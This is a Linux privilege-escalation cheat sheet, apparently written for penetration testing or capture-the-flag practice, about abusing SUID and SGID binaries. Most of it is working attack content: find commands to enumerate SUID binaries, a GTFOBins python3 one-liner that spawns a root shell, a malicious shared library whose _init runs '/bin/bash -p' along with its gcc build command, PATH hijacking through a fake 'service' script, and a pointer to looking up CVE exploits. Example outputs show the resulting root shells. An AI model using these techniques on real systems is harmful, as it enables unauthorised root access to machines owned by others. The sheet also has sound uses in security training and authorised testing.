SUID / SGID BINARIES

Find SUID binaries

Binaries that run as owner (often root) — Custom/unusual SUID = exploit

find / -perm -4000 -type f 2>/dev/null
Example Output
find / -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec     <- PwnKit!
/opt/custom_app     <- non-standard SUID!
(Focus on non-standard binaries)

Find SGID binaries

Binaries that run as group — Less common but still useful

find / -perm -2000 -type f 2>/dev/null
Example Output
find / -perm -2000 -type f 2>/dev/null
/usr/bin/wall
/usr/bin/crontab
/opt/custom_tool  <- non-standard!
(SGID runs as group owner, check for abuse)

GTFOBins SUID lookup

Known SUID abuses — Ignore standard ones like sudo, passwd

Search each unusual SUID binary on GTFOBins
Example Output
SUID: /usr/bin/python3

GTFOBins SUID section:
python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# whoami
root
(SUID python = instant root)

SUID shared library hijack

If SUID binary loads missing library — Write library to writable path

strace <suid_binary> 2>&1 | grep 'No such file'
Create missing .so with malicious code
Example Output
strace /opt/custom_suid 2>&1 | grep 'No such file'
open("/tmp/libcustom.so", O_RDONLY) = -1 ENOENT

Compile malicious libcustom.so:
#include<stdlib.h>
void _init(){ system("/bin/bash -p"); }

gcc -shared -fPIC -o /tmp/libcustom.so lib.c
/opt/custom_suid
# whoami
root

SUID PATH abuse

Hijack relative command calls — Binary runs your fake command as root

If SUID binary calls commands without full path:
echo '/bin/bash' > /tmp/command
chmod +x /tmp/command
PATH=/tmp:$PATH <suid_binary>
Example Output
/opt/custom_app calls 'service apache2 start' without full path

echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
PATH=/tmp:$PATH /opt/custom_app

# whoami
root

SUID binary version exploits

Outdated binaries with CVEs — Especially custom compiled ones

Check version of each SUID binary
Example Output
/opt/custom_v1.2 has SUID
Google: 'custom_app v1.2 exploit'
Exploit-DB: Buffer overflow in v1.2
(Custom compiled SUID binaries are prime targets)